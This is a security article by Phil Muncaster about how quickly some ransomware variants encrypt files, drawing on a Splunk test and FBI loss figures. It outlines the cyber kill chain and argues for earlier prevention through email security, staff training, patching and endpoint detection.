Why Faster Ransomware Means Defenders Must Shift Left on the Cyber Kill Chain

Phil Muncaster

We all know ransomware is among the top threats facing today’s organizations. Whether you’re a provider of critical national infrastructure or a regular SMB, there’s increasingly nowhere to hide. The advent of ransomware-as-a-service and the affiliate model has led to an explosion in the number of threat groups out there successfully monetizing attacks. The bad news is that the developers behind the malware they use are constantly innovating. A recent Splunk report reveals that some variants can encrypt 100,000 files in little as five minutes.

Some variants of ransomware can encrypt 100,000 files in as little as five minutes.

If nothing else, this should dispel any notions that network defenders can stop attacks once in progress. The focus must be on prevention and rapid detection at a much earlier stage in the so-called “cyber kill chain.”

The impact of ransomware

It can be difficult to accurately measure the true impact of ransomware on global organizations. The official FBI estimate for 2021 was losses of just over $49m, off the back of just 3,729 cybercrime reports. It’s clear that many breached organizations still aren’t reporting incidents, something that should change with a new bill making its way through Congress. The FBI also admits that its estimate doesn’t include things like lost business, time, wages, equipment, or third-party incident response services. All of these can cost organizations dearly. 

Many breached organizations still aren't reporting incidents

However, when a single attack is reported to have cost one business process outsourcing giant as much as $42m, and when one ransomware group is able to spend millions on staff salaries, tools, and services each year, it’s clearly a highly lucrative industry. A separate study from Palo Alto networks, for example, claimed average ransom payments last year surged to $541,000.

What the Splunk test reveals

With so much at stake, it’s perhaps not surprising that the bad guys are always looking for ways to gain a competitive advantage. One such way is to accelerate the time it takes to encrypt all of a victim organization’s files—thus reducing the opportunity for defenders to stop an attack before it’s too late, and increasing the likelihood of them paying a ransom. 

The average organization in the Americas takes three full days to detect ransomware

Splunk analyzed 10 ransomware variants and found that the median time taken to encrypt 100,000 files, or 53GB, stood at just 43 minutes. Some variants took far less: Conti was the fastest at just five minutes. Babuk took around a minute longer, and then came Avaddon (13 minutes) and Ryuk (14 minutes). Given that the average organization in the Americas takes three full days to detect ransomware on its networks, this would suggest that the advantage lies with the attackers. As Splunk argues:

“The average median duration demonstrates a limited window of time to respond to a ransomware attack once the encryption process is underway. This can prove even more limiting considering that the catastrophic apex may be when a single critical file is encrypted, rather than the whole of the victim’s data. With such factors in play, it may prove to be extremely difficult, if not impossible, for the majority of organizations to mitigate a ransomware attack once the encryption process begins.”

Spotting threats earlier

The key therefore is for organizations to get better at stopping ransomware threats earlier on in the cyber kill chain—a model first devised by Lockheed Martin to describe the various stages of an advanced attack. These are:

  1. Reconnaissance – including harvesting of email addresses. 
  2. Weaponization – coupling an exploit with a backdoor into a payload.
  3. Delivery – delivering that payload via email, web, and other channels.
  4. Exploitation – exploiting a vulnerability to execute malicious code on the victim’s system.
  5. Installation – installing malware on an IT asset.
  6. Command & Control – opening comms channels for remote manipulation of the victim.
  7. Actions on objectives – accomplishing original goals with remote access to the victim system.

If the actions in the objective phase refer to the actual encryption of assets, organizations must move back in the kill chain to prevent an attack from reaching that stage. According to Splunk, this means focusing on stages three and four: delivery and exploitation. 

The key therefore is for organizations to get better at stopping ransomware threats earlier in the cyber kill chain

This is certainly possible, by taking measures such as:

  • Email security to detect malicious payloads.
  • Improved staff training to help spot phishing emails.
  • A risk-based patching program to remediate vulnerabilities before they can be exploited. 
  • Detection and response tools at the endpoint (EDR), and across the IT environment (XDR) to spot suspicious behavior before malware is installed.

Even by the FBI’s estimates, losses to ransomware soared 449% between 2019 and 2021, while the volume of reports surged 82%. To avoid becoming the next victim it makes sense to double down on prevention, detection, and response early in the kill chain. Because once that ransomware payload is activated, there may not be much time left. 

secure your network

Share this story: